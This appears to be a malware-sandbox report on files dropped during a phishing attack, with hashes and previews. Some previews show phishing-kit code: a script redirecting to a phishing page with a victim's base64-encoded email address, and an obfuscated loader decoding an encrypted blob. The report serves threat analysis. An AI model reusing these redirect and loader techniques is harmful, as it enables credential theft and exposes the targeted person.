                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2673
                                                                Entropy (8bit):3.979304525789493
                                                                Encrypted:false
                                                                SSDEEP:48:8UdRTZdDEHTidAKZdA1FehwiZUklqehTy+3:8u/Dosy
                                                                MD5:F3AD80C68906CD7B8B652F63EE23985A
                                                                SHA1:0CF059A11A30E54F31EC9639129232AD3078E16A
                                                                SHA-256:8708488138222D0D492C7C216B4EDE2824E12E7EA5A4181343D735C515298A70
                                                                SHA-512:6C05B74D79234AAF732A0D33D3E392FF7C43ED2918F8235951E2F06C2541C97578523E9346A47E36833DD7AAC6CB642A6632242DB51665CD53E2771E418D5C45
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,.....P.l....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yn.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yn.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yn............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yo............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........cu.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2675
                                                                Entropy (8bit):4.001013221905286
                                                                Encrypted:false
                                                                SSDEEP:48:8fOdRTZdDEHTidAKZdA1seh/iZUkAQkqehcy+2:8fw/De9Qxy
                                                                MD5:D2345B847BC11D12E27F857E129884B6
                                                                SHA1:58DF385D40F72FD92D729DE88C2750AD34B83F80
                                                                SHA-256:F4FD95F56542380DA2F952B62766095DE9831E581DE4D16E97F8B7A136022E84
                                                                SHA-512:0E74853EFFD3CCA0D11FE2965A6E381F452F38D0DE5466B2F925A73436C48DA24D12723FD5865B9CBD41BE18391F5BA9A9FDE1B41640A1C1E82966EE224B21E3
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,.....0.k....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yn.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yn.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yn............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yo............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........cu.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2689
                                                                Entropy (8bit):4.009787395585853
                                                                Encrypted:false
                                                                SSDEEP:48:8GdRTZdAHTidAKZdA14meh7sFiZUkmgqeh7s6y+BX:8I/+noy
                                                                MD5:ED68A763F3DC8C2AACEB3F4BA12DCBBC
                                                                SHA1:BE65539E8013627F4899B7A9FAB720D379187BB9
                                                                SHA-256:EBF978FBB9495D1E4B8BDB1AEDA31B5CF3EB6E0EEAFF9BA718D1E26100FD1F9F
                                                                SHA-512:59BD655615A04CDFF1C89C7134BA8B9FDFD13A22542FF106BAD185167320541EFEF2C77AF6A23B057E60882A8253255EE33108391D3ADFA6C8C1470BDCC543BF
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yn.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yn.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yn............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........cu.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):4.000167738313145
                                                                Encrypted:false
                                                                SSDEEP:48:83dRTZdDEHTidAKZdA1TehDiZUkwqehQy+R:8r/DViy
                                                                MD5:D2AC926ECFC56CD2CB23684D4493F74B
                                                                SHA1:BD69C99AACA1BF9111CE9971CA7FEAE2B318820D
                                                                SHA-256:2CE12A66485834D87C7E00B1AE853ECB2667E25934E113D447F461AA77280090
                                                                SHA-512:26BB3D37A337CE8A0B0002F17E5545F4425F68AE071534FBEFF204748EF77AACE52FFAEC4A83AEEF3D010F2DDA36EE4F932B9616F99ECEB20D0821C19CC8FEAB
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,....>..k....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yn.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yn.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yn............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yo............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........cu.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):3.988531677414973
                                                                Encrypted:false
                                                                SSDEEP:48:81ldRTZdDEHTidAKZdA1dehBiZUk1W1qehWy+C:8X/Dl92y
                                                                MD5:A7C942B8F84593BEE05C7C3BC038BB75
                                                                SHA1:0F44801654BB52DACC019D92E8E9F2929AE86B38
                                                                SHA-256:7F69ABEB8D4585EB8A894C0C6D508099E3ACEB34627D37F7D466B49B798F7395
                                                                SHA-512:80762CC507C90501E54F87D5D9F36B826B4E23E51349A9306CAAA5A971308AD6A70A1F6BCCFE1AEA5A2F7F9089F19F0A45F0D3DCE14DEBF51CE6BAEB86D9A084
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,....Y..k....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yn.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yn.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yn............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yo............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........cu.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Aug 27 17:03:29 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):3.9953494320750655
                                                                Encrypted:false
                                                                SSDEEP:48:85dRTZdDEHTidAKZdA1duTeehOuTbbiZUk5OjqehOuTboy+yT+:8l/DNTfTbxWOvTboy7T
                                                                MD5:87CC68ACDC4C6451484E08614330B063
                                                                SHA1:A42E1BDDD277ECED496156754FE9E46B18F7FE92
                                                                SHA-256:15FF785BF2EF50FABD8BFEFDB084BA2F1DDE09A075219558D2CE4E28DFA75753
                                                                SHA-512:FEF33F2DA778AB714E2B5575591F5496449BD75C0C109E9AD2A2C89E282BBB34F6C6ABE307BF3E9B46279376D9398FA6B06905FD214BC11971F34F9AE8549B0F
                                                                Malicious:false
                                                                Preview:L..................F.@.. ...$+.,....Wy.k....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.YZ.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Yn.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Yn.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Yn............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yo............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........cu.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Microsoft Outlook email folder (>=2003)
                                                                Category:dropped
                                                                Size (bytes):271360
                                                                Entropy (8bit):3.0992351371769984
                                                                Encrypted:false
                                                                SSDEEP:6144:e3NUCEkNCEkrCEkaCEk/CEkMCEkGCEknq:lCEkNCEkrCEkaCEk/CEkMCEkGCEk
                                                                MD5:D5307D424DD038F22A036D837D2E83F9
                                                                SHA1:64F606966618101D01FE7A4BDDB532A620B70DA4
                                                                SHA-256:B35FE6B18480BCF7D4BFA3909F90951E3334CBAC56E17D274FB0E45A10BDA4C6
                                                                SHA-512:0A168F2DB856C1CC95CF37C75B36F02D9C577ABE2F3E2C0585668D7320F472F12572C509F4585FA6FF6F67E2C92EB666046D5C0EF3AF682D1BC21B5E1C68A6CB
                                                                Malicious:false
                                                                Preview:!BDN....SM......\...............A.......b................@...........@...@...................................@...........................................................................$.......D.......T..............8...............?...........................................................................................................................................................................................................................................................................................T........y...LH.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):131072
                                                                Entropy (8bit):3.9579419745948656
                                                                Encrypted:false
                                                                SSDEEP:3072:GpjO4+CEkNCEkrCEkaCEk/CEkOCEkGCEkCBApj3Vh:GqCEkNCEkrCEkaCEk/CEkOCEkGCEkC2N
                                                                MD5:B88C4007B1CB4FD100D888104BA9D52A
                                                                SHA1:651854B1581A828B1E9772671DC13A2C19A859DA
                                                                SHA-256:363226874797FD5E8E4D9CE504B55CE5F16F1DFD81E01181E96C09C76BC71EB8
                                                                SHA-512:83A7B6650C50BD7622129243D129081AF81133BCB523DBDECE9985F4E9843ED704E0FD1E9DD2D165561A4C399EE30F9591C83A54AA36B221FDB66DDA77BBEE8A
                                                                Malicious:false
                                                                Preview:....0...l.............._.........D............#..._...............................................................................................................................................................................................?...................................................................................................................................................................................................................................................................................................................o.D......E[..0...m.............._.........B............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):152
                                                                Entropy (8bit):4.9846877494067625
                                                                Encrypted:false
                                                                SSDEEP:3:gn3QV9KGBkADFoHDX6zmgEDiTM4/L2m2j/RndWp7b:63GKGKmmH76CBDiTM2K2b
                                                                MD5:CA3B7148C0C91CA466722DB4345ACDB4
                                                                SHA1:A8F20E36D584C3E99D2BF1647A60E986FACE2C9A
                                                                SHA-256:890CC859593E412C34C88623D0FC009B20AD95A3D25AC0321D4FAD54DE478EF4
                                                                SHA-512:13CEB9833FEBC74342972BAF7ABBBE3305105F3F4C3B2933C401D35F88FC763C1A67615784DB6893687BDF699D93A277D74263E745F45C5F36609F1B410076C9
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/js/images/tvavx.php
                                                                Preview:<script>window.top.location.href = "https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==";</script>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):47992
                                                                Entropy (8bit):5.605846858683577
                                                                Encrypted:false
                                                                SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                MD5:CF3402D7483B127DED4069D651EA4A22
                                                                SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                Malicious:false
                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (45034)
                                                                Category:dropped
                                                                Size (bytes):45035
                                                                Entropy (8bit):5.400557193761079
                                                                Encrypted:false
                                                                SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggUydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgUjJY
                                                                MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                                SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                                SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                                SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                                Malicious:false
                                                                Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32849), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):33377
                                                                Entropy (8bit):5.68574828101386
                                                                Encrypted:false
                                                                SSDEEP:768:0wGf1G1/JklnLx3OevoPaU0GqwG8QFwebxzR9DfU224rTZh6f4X7iZd:PG41/C/pvazmTFV9Q1ETZh6wX7Sd
                                                                MD5:DBD1CE80CDB4F62728A652F9D276DA96
                                                                SHA1:8BBE328DC726C15AF19216EF11202563A5BBF9D2
                                                                SHA-256:BE1217A7A31B502E2029B48495F0880FF6C74DC441C01A80D0965DBE3AA5970E
                                                                SHA-512:C278D781ACD6403139AE3F312BF4E73C2107A33C366D507BB6F18477BD9658669AC7B00F9B6B259B12B16731548E48658B53E7036F0BD0DFFD7434E5D0E91F5E
                                                                Malicious:false
                                                                Preview:var issue= document.createElement("script");..issue.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");..document.head.append(issue);..issue.onload=function(){..var {a,b,c,d} = JSON.parse(atob("eyJhIjoiaEo4VDhyMGN5bzNUZXhJT00wSmV6REc0TlwveTcrRHBMTDE5djZnRjhNc09mR2JaU3MydnoyVlBLbGtlOFwvMUpWbTJvZTByZ01ESERSTzZ2dmlieGkyNWhqbGhMZUgrTnhOcW9ja2pTOTFucXF3clJtOGEzZk1SQnRwY0w1bW9ER2VsXC9qNWdDYjVqSWoxOFwvaVY1Y3BhdzBhdUY3NCtiZVR4cVhiN3dHQ0Q3TWlzV1hTcWxtdldHRjlrT3JoaDFpME5pQTErWHk5Tkw5NlpLZ013NjNwN2NHSGZIak5cL2NXSUtXdHdTaHZDR00rbzhXb25TeTl4SVlJOEVlSVlveEM5Tlh6clpHTFJPY29uK2h1V1ljSnJyZThDTWZKR09pTzFEdXR1U1VTMVZwdFlwRHRxWDZNck9ubTZYM0dybEpPYlhMblwvaGhTd09uSXpXZ01ZQXZcL2VhNG1Ubnc0UkNmakxxcER3MzZTdFZhSlZqbjFGTkdqc2NFdG5CakE2R3lnXC9FTkt5UmJmUHF5RGdxc1lQbTVGdFRHNlVvWFZDSkt2Q2RoXC81cGxLT3dQajg3b1lZdTE4eVQwb2xqTWxpMnp0OEsrdHd1UGp5REhEOWNDbm5Qc1AzWmJnMjBZMmpxblwvOGI2bGd6allJUDRENWFOb3NmK1VrbVY4RmxnaWV5ZThIdWpzUHJheUxUbUplQzNPVUtlY2E3U0ZIb05yTnFMOFBYa21mNVozd1dSQUt
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (440), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):6879
                                                                Entropy (8bit):4.691707843924999
                                                                Encrypted:false
                                                                SSDEEP:96:oS2kpNnlODTFzHHCFwbOP9AKfWDpDciajLb:oSL+FzHWfghajLb
                                                                MD5:F446C7817088A24E58AD211AB1579DE5
                                                                SHA1:455B41839FE1E8A516C05044B6EB530F6992DDAD
                                                                SHA-256:E31C443128DD194097FA3E2C918609953BD3D1AA579DCB074A9A40BF1DD7E377
                                                                SHA-512:639308CD585FB838256646BF72F03D568555A3698C6943CCE3D83B0784D15ACD44D274AD4D78F03D2A579091ABBFC3C8E156933052BAC7F950979C2FAAD0B87B
                                                                Malicious:false
                                                                Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Automobile History Fans - glansaolksnu.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.KULNSsarDRsN35B121KptQHaEK') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;.. te
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (32821), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):33389
                                                                Entropy (8bit):5.685295096874434
                                                                Encrypted:false
                                                                SSDEEP:768:ASPz9XOs0I3qKF1U68YtpC2I3BO8Y5zBHctI5ovKndy6e:V70IdU6FS2J8YL6Kdy6e
                                                                MD5:1924954FB7E4D86F55FE9736D4133673
                                                                SHA1:B3FC4C023C1AADAB136265907FBF11CA09225B9C
                                                                SHA-256:27B9B8F128C6CC88A2BA1394FC601F63E4ECA5B2F131CD57B7538BF5A0C86925
                                                                SHA-512:AB6FEBCD9AC5A6D648377016E43323DAD5ABE8786291457D3BEEA76F0782CB73CD23C0D8743E363095F1AC72B13B5BAD1C45E1CD4D9168376FA4420FB084C4F2
                                                                Malicious:false
                                                                URL:https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber
